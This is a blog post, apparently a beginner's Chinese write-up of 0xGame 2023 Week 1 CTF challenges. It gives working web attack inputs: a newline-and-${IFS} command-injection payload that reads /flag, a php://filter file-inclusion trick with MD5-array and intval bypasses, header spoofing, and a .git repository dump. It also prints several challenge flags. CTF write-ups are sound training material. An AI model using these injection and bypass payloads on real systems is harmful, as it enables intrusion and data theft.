

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="notbad3">
  <meta name="keywords" content="the quieter you become,the more you can hear">
  
    <meta name="description" content="菜鸟的Write_up，只接触过web">
<meta property="og:type" content="article">
<meta property="og:title" content="Writeup_2023_0xGame_Week1">
<meta property="og:url" content="http://example.com/2023/09/18/ko1/index.html">
<meta property="og:site_name" content="rdj&#39;s Blog">
<meta property="og:description" content="菜鸟的Write_up，只接触过web">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/ping1.png">
<meta property="og:image" content="http://example.com/img/repo1.png">
<meta property="og:image" content="http://example.com/img/repo2.png">
<meta property="og:image" content="http://example.com/img/rerpo3.png">
<meta property="og:image" content="http://example.com/img/repo4.png">
<meta property="og:image" content="http://example.com/img/ok1.png">
<meta property="og:image" content="http://example.com/img/shark.png">
<meta property="og:image" content="http://example.com/img/shark2.png">
<meta property="og:image" content="http://example.com/img/shark3.png">
<meta property="og:image" content="http://example.com/img/hiideandseek.png">
<meta property="og:image" content="http://example.com/img/secret.png">
<meta property="og:image" content="http://example.com/img/pwn1.png">
<meta property="og:image" content="http://example.com/img/vig.png">
<meta property="article:published_time" content="2023-09-18T12:08:50.000Z">
<meta property="article:modified_time" content="2023-10-22T10:58:57.495Z">
<meta property="article:author" content="notbad3">
<meta property="article:tag" content="the quieter you become,the more you can hear">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/ping1.png">
  
  
  
  <title>Writeup_2023_0xGame_Week1 - rdj&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>notbad3</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Writeup_2023_0xGame_Week1"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-09-18 20:08" pubdate>
          2023年9月18日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          38 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Writeup_2023_0xGame_Week1</h1>
            
            
              <div class="markdown-body">
                
                <p>菜鸟的Write_up，只接触过web</p>
<span id="more"></span>



<h1 id="web部分"><a href="#web部分" class="headerlink" title="web部分"></a>web部分</h1><h3 id="Week-1-ping"><a href="#Week-1-ping" class="headerlink" title="[Week 1] ping"></a>[Week 1] ping</h3><p>根据题目想到可能是RCE：</p>
<p><img src="/img/ping1.png" srcset="/img/loading.gif" lazyload alt="ping1"></p>
<p>看下源码发现提示：<code>&lt;!-- visit &#39;/api.php?source&#39; for hint --&gt;</code>,访问：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs PHP"> <span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">sanitize</span>(<span class="hljs-params"><span class="hljs-variable">$s</span></span>) </span>&#123;<br>    <span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&#x27;;&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$s</span>); <span class="hljs-comment">//;过滤可以用其它分隔符绕过，比如&amp;&amp;啥的</span><br>    <span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&#x27; &#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$s</span>); <span class="hljs-comment">//空格过滤可以用$&#123;IFS&#125;啥的绕过</span><br>    <span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&#x27;/&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$s</span>); <span class="hljs-comment">// /过滤可以用反引号和printf配合绕过：`printf$&#123;IFS&#125;&quot;\57&quot;`</span><br>    <span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&#x27;flag&#x27;</span>, <span class="hljs-string">&#x27;&#x27;</span>, <span class="hljs-variable">$s</span>); <span class="hljs-comment">//flag被过滤可以用通配符*绕过：fl*</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$s</span>;                      <br>&#125;<br><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;source&#x27;</span>])) &#123;<br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>    <span class="hljs-keyword">die</span>();<br>&#125;<br><br><span class="hljs-keyword">if</span> (!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;ip&#x27;</span>])) &#123;<span class="hljs-comment">//POST传IP</span><br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;No IP Address&#x27;</span>);<br>&#125;<br><br><span class="hljs-variable">$ip</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;ip&#x27;</span>];<br><br><span class="hljs-variable">$ip</span> = <span class="hljs-title function_ invoke__">sanitize</span>(<span class="hljs-variable">$ip</span>); <span class="hljs-comment">//对传过去的ip进行过滤</span><br><br><span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;/((\d&#123;1,2&#125;|1\d\d|2[0-4]\d|25[0-5])\.)&#123;3&#125;(\d&#123;1,2&#125;|1\d\d|2[0-4]\d|25[0-5])/&#x27;</span>, <span class="hljs-variable">$ip</span>)) &#123;<br>    <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;Invalid IP Address&#x27;</span>);<br>&#125;<span class="hljs-comment">//正则匹配IPv4地址的格式，可以用换行符%0a绕过</span><br><br><span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;ping -c 4 &#x27;</span>.<span class="hljs-variable">$ip</span>. <span class="hljs-string">&#x27; 2&gt;&amp;1&#x27;</span>);  <span class="hljs-comment">//命令执行</span><br><br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<p>先利用ls看看当前目录下都有啥东西：</p>
<p><code>ip=127.0.0.1%0als</code></p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs stylus">api<span class="hljs-selector-class">.php</span><br>index<span class="hljs-selector-class">.html</span><br>simple.css<br></code></pre></td></tr></table></figure>

<p>去根目录看看：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">ip</span>=<span class="hljs-number">127.0.0.1</span>%<span class="hljs-number">0</span>als<span class="hljs-variable">$&#123;IFS&#125;</span>`printf<span class="hljs-variable">$&#123;IFS&#125;</span><span class="hljs-string">&quot;\57&quot;</span>`<br><span class="hljs-attribute">bin</span><br><span class="hljs-attribute">boot</span><br><span class="hljs-attribute">dev</span><br><span class="hljs-attribute">etc</span><br><span class="hljs-attribute">flag</span><br></code></pre></td></tr></table></figure>

<p>cat读&#x2F;flag的内容：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">ip</span>=<span class="hljs-number">127.0.0.1</span>%<span class="hljs-number">0</span>acat<span class="hljs-variable">$&#123;IFS&#125;</span>`printf<span class="hljs-variable">$&#123;IFS&#125;</span><span class="hljs-string">&quot;\57&quot;</span>`fl*<br></code></pre></td></tr></table></figure>

<p>flag：0xGame{19c71976-d7d8-4ab8-9ea5-6ea3800f59f6}</p>
<h3 id="Week-1-baby-php"><a href="#Week-1-baby-php" class="headerlink" title="[Week 1] baby_php"></a>[Week 1] baby_php</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">// flag in flag.php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;a&#x27;</span>]) &amp;&amp; <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;b&#x27;</span>]) &amp;&amp; <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;c&#x27;</span>]) &amp;&amp; <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&#x27;name&#x27;</span>])) &#123; <br>    <span class="hljs-variable">$a</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;a&#x27;</span>];<br>    <span class="hljs-variable">$b</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;b&#x27;</span>];<br>    <span class="hljs-variable">$c</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;c&#x27;</span>];<br>    <span class="hljs-variable">$name</span> = <span class="hljs-variable">$_COOKIE</span>[<span class="hljs-string">&#x27;name&#x27;</span>];<span class="hljs-comment">//GET传a和b,POST传c,COOKIE超全局变量中name对应$name</span><br><br>    <span class="hljs-keyword">if</span> (<span class="hljs-variable">$a</span> != <span class="hljs-variable">$b</span> &amp;&amp; <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$a</span>) == <span class="hljs-title function_ invoke__">md5</span>(<span class="hljs-variable">$b</span>)) &#123; <span class="hljs-comment">//md5加密数组会返回null，null==null成立</span><br>        <span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">is_numeric</span>(<span class="hljs-variable">$c</span>) &amp;&amp; <span class="hljs-variable">$c</span> != <span class="hljs-number">1024</span> &amp;&amp; <span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$c</span>) == <span class="hljs-number">1024</span>) &#123;<br>            <span class="hljs-keyword">include</span>(<span class="hljs-variable">$name</span>.<span class="hljs-string">&#x27;.php&#x27;</span>); <span class="hljs-comment">//c不能是个数字，可以在任意数字后加个字母达到目的</span><br>        &#125;                          <span class="hljs-comment">//c不能等于1024，结合后面的intval函数想到利用小数绕过，intval一个小数并不会遵循四舍五入原则</span><br>    &#125;                              <span class="hljs-comment">//提示flag在flag.php中，文件包含漏洞。因为后面会加.php所以直接传flag看看情况</span><br>&#125;<br><span class="hljs-meta">?&gt;</span> <br></code></pre></td></tr></table></figure>

<p>综上：</p>
<p>GET<code>?a[]=1&amp;b[]=2</code>POST<code>c=1024.9a</code>并且<code>Cookie: name=flag</code></p>
<p>没反应，试了试目录穿越也没结果。想到用伪协议读flag.php：</p>
<p><code>Cookie: name=php://filter/convert.base64-encode/resource=flag</code></p>
<p>得到一串base64:</p>
<p><code>PD9waHAKCiRmbGFnID0gJzB4R2FtZXs0M2JiM2UyNC0wODI0LTQ4Y2ItOTVkMC1jNDcxNTQwYzA5NTN9JzsKCj8</code></p>
<p>解个码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-variable">$flag</span> = <span class="hljs-string">&#x27;0xGame&#123;43bb3e24-0824-48cb-95d0-c471540c0953&#125;&#x27;</span>;<br><br><span class="hljs-meta">?&gt;</span><br><br></code></pre></td></tr></table></figure>

<p><code>flag = 0xGame&#123;43bb3e24-0824-48cb-95d0-c471540c0953&#125;</code></p>
<h3 id="Week-1-hello-http"><a href="#Week-1-hello-http" class="headerlink" title="[Week 1] hello_http"></a>[Week 1] hello_http</h3><p>第一关提示用<code>Get</code>方式传<code>query</code>，而且值必须是<code>ctf</code></p>
<p><code>?query=ctf</code></p>
<p>第二关提示用<code>POS</code>T传<code>action</code>,而且值必须是<code>getflag</code></p>
<p><code>action=getflag</code></p>
<p>第三关提示 <code>you are not admin</code>，想到这东西可能在cookie放着，burpsuite抓包：发现<code>Cookie: role=guest</code>，改成<code>Cookie: role=admin</code></p>
<p>第四关提示<code>Error: Only allow local IP</code>，还是抓包加个XFF头：</p>
<p><code>X-Forwarded-For:127.0.0.1</code></p>
<p>第五关提示<code>Error: You are not using HarmonyOS Browser 😡</code>，还是抓包改User-Agent：</p>
<p><code>User-Agent:HarmonyOS Browser</code></p>
<p>第六关提示必须来自<code>ys.mihoyo.com</code>，抓包改Referer：</p>
<p><code>Referer: ys.mihoyo.com</code></p>
<p>得到Flag:<code>0xGame&#123;2c1a10fb-921e-4250-820f-5ce36940b8b5&#125;</code></p>
<h3 id="Week-1-repo-leak"><a href="#Week-1-repo-leak" class="headerlink" title="[Week 1] repo_leak"></a>[Week 1] repo_leak</h3><p>进环境后发现是个博客主页，里面有个Notice博文写了这么个东西：</p>
<p><code>There is noting here. Using Git for version control</code></p>
<p>结合题目想到可能是敏感信息泄露，而且访问<code>/.git</code>并没有弹404</p>
<p>用dirsearch扫了一下，发现大量.git文件，猜测git泄露：</p>
<p><img src="/img/repo1.png" srcset="/img/loading.gif" lazyload alt="repo1"></p>
<p>GitHack弄它：</p>
<p><code>python2 GitHack.py http://120.27.148.152:50013/.git</code></p>
<p><img src="/img/repo2.png" srcset="/img/loading.gif" lazyload alt="repo2"></p>
<p>在存储扫描结果的文件夹利用<code>git log</code>查看每个commit都干了啥：</p>
<p><img src="/img/rerpo3.png" srcset="/img/loading.gif" lazyload alt="rerpo3"></p>
<p>看到了三个版本，发现有个 <code>add post : flag</code></p>
<p>对比下版本拿flag:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">git diff ea44cb8ff3c27bb1db6d3acc4c875144d295045d 8a5b670558921bd232d75b29542492f00698298b<br></code></pre></td></tr></table></figure>

<p><img src="/img/repo4.png" srcset="/img/loading.gif" lazyload alt="repo4"></p>
<p><code>0xGame&#123;3fc49725-23b5-4f28-8c64-16a3459b67b7&#125;</code></p>
<h3 id="Week-1-signin"><a href="#Week-1-signin" class="headerlink" title="[Week 1] signin"></a>[Week 1] signin</h3><p>明明是签到却是最后一个解出来的:(运气好被我乱点点出来了</p>
<p><img src="/img/ok1.png" srcset="/img/loading.gif" lazyload alt="ok1"></p>
<p><code>flag：0xGame&#123;c788fa80-2184-429f-b410-48cb8e2de0ff&#125;</code></p>
<h1 id="MISC部分"><a href="#MISC部分" class="headerlink" title="MISC部分"></a>MISC部分</h1><h3 id="Week-1-shark-shark"><a href="#Week-1-shark-shark" class="headerlink" title="[Week 1] shark shark"></a>[Week 1] shark shark</h3><p>第一次做杂项的题 :) 下载附件后用wireshark打开，发现好像是个登录过程？登录后执行了一些命令 ：</p>
<p><img src="/img/shark.png" srcset="/img/loading.gif" lazyload alt="shark"></p>
<p>直接搜<code>0xGame</code>和<code>flag</code>都没结果。。但在返回包里有这么个东西？</p>
<p><img src="/img/shark2.png" srcset="/img/loading.gif" lazyload alt="shark2"></p>
<p>把data拿出来拿去问了CHATGPT:)说这是一个ZIP文件的十六进制表示，要把它解码成二进制数据再解压。发现有个<code>flag.txt</code>文件，但需要密码：</p>
<p><img src="/img/shark3.png" srcset="/img/loading.gif" lazyload alt="shark3"></p>
<p>想到刚才追踪流的时候有个very_safe_password，尝试了一下得到了flag：<code>0xGame&#123;7a504dab-ada6-4c41-adb3-0d1530098cd4&#125;</code></p>
<h3 id="Week-1-hide-and-seek"><a href="#Week-1-hide-and-seek" class="headerlink" title="[Week 1] hide and seek"></a>[Week 1] hide and seek</h3><p>根据题目提示和师傅在群里的提示，下载了<code>stegseek</code>这个工具，弄一下就得到flag了：</p>
<p><img src="/img/hiideandseek.png" srcset="/img/loading.gif" lazyload alt="hiideandseek"></p>
<h3 id="Week-1-least-and-most"><a href="#Week-1-least-and-most" class="headerlink" title="[Week 1] least and most"></a>[Week 1] least and most</h3><p>题目提示是隐写，网上下了个叫<code>stegsolve</code>的工具，一通乱点得到了：</p>
<p><code>0xGame&#123;l sb_com</code>和<code>bined_wi th_msb&#125;</code>。</p>
<h3 id="Week-1-signin-1"><a href="#Week-1-signin-1" class="headerlink" title="[Week 1] signin"></a>[Week 1] signin</h3><p><code>R0I0RU9ZTE5NVjVWT1pMTU1NWUcyWks3S1JYVjZNRFlJNVFXMlpKU0dBWkRHSUpCUFU9PT09PT0=</code></p>
<p>看着像base64，先解码看看啥情况：</p>
<p><code>GB4EOYLNMV5VOZLMMMYG2ZK7KRXV6MDYI5QW2ZJSGAZDGIJBPU======</code></p>
<p>再用base32解一下：</p>
<p><code>0xGame&#123;Welc0me_To_0xGame2023!!&#125;</code></p>
<h3 id="Week-1-重生之我在教学楼打cs"><a href="#Week-1-重生之我在教学楼打cs" class="headerlink" title="[Week 1] 重生之我在教学楼打cs"></a>[Week 1] 重生之我在教学楼打cs</h3><p>下载发现是个bsp文件，根据师傅的提示发现这东西是个cs1.6的地图文件，重命名一下放到<code>cstrike</code>下的<code>maps</code>文件夹里，然后cs1.6直接进地图。在鼎右下角找到了一串小字：</p>
<p><code>0xGame&#123;CS_very_good&#125;</code></p>
<h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h3 id="Week-1-找不到且不对劲的flag"><a href="#Week-1-找不到且不对劲的flag" class="headerlink" title="[Week 1] 找不到且不对劲的flag"></a>[Week 1] 找不到且不对劲的flag</h3><p><code> nc 8.130.35.16 51000</code>后<code>ls</code>,发现有个<code>flag</code>但<code>cat</code>读了发现是假的:</p>
<p><img src="/img/secret.png" srcset="/img/loading.gif" lazyload alt="secret"></p>
<p><code>ls -al</code>发现有个<code>.secret</code>文件，<code>cat</code>读了下得到了<code>flag</code></p>
<p><img src="/img/pwn1.png" srcset="/img/loading.gif" lazyload alt="pwn1"></p>
<h1 id="Crypto部分"><a href="#Crypto部分" class="headerlink" title="Crypto部分"></a>Crypto部分</h1><h3 id="Week-1-Vigenere"><a href="#Week-1-Vigenere" class="headerlink" title="[Week 1] Vigenere"></a>[Week 1] Vigenere</h3><p>题目描述：密文：0dGmqk{79ap4i0522g0a67m6i196he52357q60f} 古老而神秘的加密方式？</p>
<p><code>flag</code>格式<code>0xGame&#123;xxxx&#125;</code>，现在开头是<code>0dGmqk</code>，猜测密钥前四位是<code>game</code>?，先在线解密看下结果：</p>
<p><img src="/img/vig.png" srcset="/img/loading.gif" lazyload alt="vig"></p>
<p>得到flag。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>Writeup_2023_0xGame_Week1</div>
      <div>http://example.com/2023/09/18/ko1/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>notbad3</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年9月18日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/10/12/NewStarCTF_Week2/" title="Writeup_2023_NewStarCTF_Week2">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Writeup_2023_NewStarCTF_Week2</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/09/17/helloworld/" title="BUUCTF做题记录_1">
                        <span class="hidden-mobile">BUUCTF做题记录_1</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
